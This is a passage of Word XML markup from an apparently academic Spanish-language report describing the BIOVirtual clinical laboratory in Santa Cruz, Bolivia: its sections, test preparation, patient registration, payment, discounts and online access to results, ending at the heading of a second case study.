        <w:t xml:space="preserve">Dado el creciente aumento de la población en la ciudad de Santa Cruz de la Sierra y en Bolivia surge la necesidad de automatizar los servicios de laboratorio para facilitar al usuario o paciente el uso del mismo, es por eso que éste laboratorio clínico gracias a su plataforma on-line permite al usuario realizar diferentes consultas en tiempo real mediante su página web </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00E25404">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:i/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>www.biovirtual.com.bo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la cual permite hacer cotizaciones en moneda nacional de los estudios a realizar, como también, visualizar sus resultados con total privacidad y confianza una vez procesados por un personal altamente capacitado y con tecnología de avanzada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Así como también tener un historial completo de sus estudios en el tiempo, misma información que también será brindada a su médico, facilitando la entrega física de los mismos, es decir que cuando usted acuda a su consulta su médico ya tendrá conocimiento de sus resultados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es considerado como de los primeros laboratorios virtuales en Santa Cruz, a continuación, se detallan las razones:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Catálogo de Análisis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Laboratorio </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>BIOVirtual</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> cubre un muy amplio espectro de determinaciones, por lo que su personal maneja un gran volumen de muestras, lo que los ubica como un laboratorio de alta complejidad, cubriendo prácticamente todo el aspecto de análisis en las distintas especialidades médicas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">La distribución interna comprende secciones de trabajo, interconectadas con una red ágil de computación de diseño propio. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Los distintos sectores que conforman el laboratorio son: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Hematología</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Química sanguínea</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Serología</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Parasitología</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Uroanálisis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Bacteriología</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Patología.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">La lista de los análisis es bastante extensa, por </w:t>
      </w:r>
      <w:r w:rsidR="00CF0096" w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>ende,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se la puede encontrar en la sección de anexos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El paciente debe cumplir con las condiciones y especificaciones previas para realizarse un respectivo análisis, por </w:t>
      </w:r>
      <w:r w:rsidR="00CF0096" w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>ejemplo,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para realizarse un análisis de ácido úrico tiene que cumplir las siguientes especificaciones:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="002A730A" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A730A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“Ayuno de 10 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A730A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>hrs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A730A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">. Las sustancias fuertemente reductoras (Vitamina C, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A730A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Buscapina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A730A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, etc.) en dosis elevadas interfieren. Existen además varias drogas que pueden interferir (diuréticos, aspirina, antinflamatorios, Vitamina C, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A730A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>warfarina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A730A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, sustancias de contraste para rayos X, etc.). Se sugiere suspender la medicación, siempre que sea posible, 24 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A730A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>hrs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A730A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>. antes de la toma de muestra.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t>Y así para los demás análisis, si el paciente cumple con las especificaciones para la realización de la toma de la muestra para un análisis en específico se procederá a registrar los datos del paciente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Registro de paciente</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Los pacientes cuando llegan por primera vez al laboratorio, son registrados por la recepcionista en el sistema tomando los siguientes datos: nombres, apellidos, edad, teléfono. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">No es de mera importancia datos más confidenciales como: carnet de identidad o </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dirección</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> pero si es necesario saber cuál es el médico que le hizo la solicitud de hacerse el análisis (si hubiese orden médica), para posteriormente enviarle los resultados al médico (si el médico trabajara de manera conjunta con la clínica).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Una vez registrado, el paciente recibe su USUARIO y CONTRASEÑA para acceder a la plataforma on-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>line  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tema desglosado más adelante).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Forma de pago</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Una vez registrado el paciente debe pagar la totalidad o un porcentaje del 70% del monto total del costo del análisis que está solicitando y al momento de recoger los resultados de los análisis el monto restante.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Descuentos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>BIOVirtual</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> tienen compromiso social, ya que hacen </w:t>
      </w:r>
      <w:r w:rsidR="00B27B46" w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>descuentos a</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> las personas con enfermedades crónicas y terminales, que necesitan realizarse análisis constantemente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">También existen descuentos diferenciales al personal que trabaja en el laboratorio sin importar su cargo </w:t>
      </w:r>
      <w:r w:rsidR="00B27B46" w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>que dicha</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> persona desempeña.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Los descuentos varían en el intervalo del 30 a 40 %.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Resultados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tomada la muestra para realizar el análisis, los resultados de esta tienen distintos tiempos de entrega de los resultados, dependiendo de diversos factores como ser:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Insumos: Nos referimos a los reactivos necesarios para realizar el análisis, por motivos de bastante demanda el laboratorio pudo haber quedado sin algunos reactivos básicos para el análisis, lo que conlleva a extender el tiempo del resultado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Derivación de muestras: Los laboratorios en la lista de análisis que ofrecen mayormente no los realizan a cabalidad todos en un 100%, sino que a aquellos análisis más complejos los derivan a laboratorios más especializados en ese tipo en específico, por </w:t>
      </w:r>
      <w:r w:rsidR="00CF0096" w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ende,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sólo serían un intermediario y esa derivación conlleva tiempo extra a la entrega de resultados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Consultas on-line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Una vez ya estuviesen listos los resultados de la muestra, éstos podrán ser visualizados desde cualquier celular o computadora, con solo ingresar su usuario y contraseña del paciente, obviamente éste servicio, viene incluido con el precio del análisis, pero sólo está disponible cuando el paciente paga la totalidad de los resultados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00B27B46" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Además,</w:t>
      </w:r>
      <w:r w:rsidR="00277259" w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> los doctores asociados con el laboratorio, que son aquellos que están registrados, podrán ver los resultados de manera on-line de sus pacientes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B27B46" w:rsidRDefault="00B27B46" w:rsidP="00277259">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B27B46" w:rsidRDefault="00B27B46" w:rsidP="00277259">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B27B46" w:rsidRPr="00BB4EFA" w:rsidRDefault="00B27B46" w:rsidP="00277259">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00CF0096" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc414243688"/>
      <w:bookmarkStart w:id="24" w:name="_Toc414318662"/>
      <w:bookmarkStart w:id="25" w:name="_Toc422314638"/>
      <w:bookmarkStart w:id="26" w:name="_Toc454371297"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Caso d</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">e Estudio #02: </w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidR="00277259" w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>“Laboratorio ZUNA”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
